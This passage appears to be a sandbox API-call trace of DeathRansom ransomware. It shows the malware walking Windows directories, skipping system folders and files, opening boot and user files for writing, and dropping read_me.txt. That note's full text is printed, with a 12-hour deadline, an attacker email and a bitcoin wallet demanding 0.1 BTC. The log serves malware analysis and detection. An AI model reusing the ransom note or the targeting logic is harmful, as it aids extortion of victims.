nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.109] CloseHandle (hObject=0x7fc) returned 1 [0077.109] GetProcessHeap () returned 0x4f10000 [0077.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cf0080 | out: hHeap=0x4f10000) returned 1 [0077.109] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x240000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0077.109] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0077.109] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x240000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0077.110] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0077.110] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0077.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\read_me.txt" (normalized: "c:\\users\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.110] GetProcessHeap () returned 0x4f10000 [0077.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ac0068 | out: hHeap=0x4f10000) returned 1 [0077.110] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Windows", cAlternateFileName="")) returned 1 [0077.110] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Windows") returned 14 [0077.110] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0077.110] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0077.110] StrStrW (lpFirst="windows", lpSrch="programdata") returned 0x0 [0077.110] StrStrW (lpFirst="windows", lpSrch="$recycle.bin") returned 0x0 [0077.110] StrStrW (lpFirst="windows", lpSrch="program files") returned 0x0 [0077.110] StrStrW (lpFirst="windows", lpSrch="windows") returned="windows" [0077.110] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="windows", cAlternateFileName="")) returned 0 [0077.110] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0077.110] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\read_me.txt") returned 18 [0077.110] CreateFileW (lpFileName="\\\\?\\C:\\read_me.txt" (normalized: "c:\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x790 [0077.163] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.163] WriteFile (in: hFile=0x790, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e44c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e44c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.164] CloseHandle (hObject=0x790) returned 1 [0077.164] GetProcessHeap () returned 0x4f10000 [0077.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8aa0058 | out: hHeap=0x4f10000) returned 1 [0077.164] GetProcessHeap () returned 0x4f10000 [0077.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a80048 | out: hHeap=0x4f10000) returned 1 [0077.164] lstrlenW (lpString="C:\\") returned 3 [0077.164] Sleep (dwMilliseconds=0x1388) [0082.201] Sleep (dwMilliseconds=0x1388) [0087.256] Sleep (dwMilliseconds=0x1388) Thread: id = 2 os_tid = 0x990 Thread: id = 3 os_tid = 0x994 [0074.872] GetProcessHeap () returned 0x4f10000 [0074.872] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0074.872] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0074.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0074.873] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0074.873] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="..", cAlternateFileName="")) returned 1 [0074.873] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0074.873] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="BCD", cAlternateFileName="")) returned 1 [0074.873] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0074.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.873] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0074.873] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0074.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.873] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0074.873] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0074.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="read_me.txt") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="autoexec.bat") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="desktop.ini") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="autorun.inf") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="ntuser.dat") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="iconcache.db") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="bootsect.bak") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="boot.ini") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="ntuser.dat.log") returned 0x0 [0074.874] StrStrW (lpFirst="bcd.log1", lpSrch="thumbs.db") returned 0x0 [0074.874] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 0 [0074.874] QueueUserWorkItem (Function=0x404e00, Context=0x7a4, Flags=0x0) returned 1 [0074.874] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0074.874] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0074.874] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="read_me.txt") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="autoexec.bat") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="desktop.ini") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="autorun.inf") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="ntuser.dat") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="iconcache.db") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="bootsect.bak") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="boot.ini") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="ntuser.dat.log") returned 0x0 [0074.875] StrStrW (lpFirst="bcd.log2", lpSrch="thumbs.db") returned 0x0 [0074.875] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 1 [0074.875] QueueUserWorkItem (Function=0x404e00, Context=0x7a8, Flags=0x0) returned 1 [0074.875] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0074.875] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0074.875] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0074.875] StrStrW (lpFirst="bootstat.dat", lpSrch="read_me.txt") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="autoexec.bat") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="desktop.ini") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="autorun.inf") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="ntuser.dat") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="iconcache.db") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="bootsect.bak") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="boot.ini") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="ntuser.dat.log") returned 0x0 [0074.876] StrStrW (lpFirst="bootstat.dat", lpSrch="thumbs.db") returned 0x0 [0074.876] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 2 [0074.876] QueueUserWorkItem (Function=0x404e00, Context=0x7b0, Flags=0x0) returned 1 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="en-US", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0074.876] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0074.876] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0074.877] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, 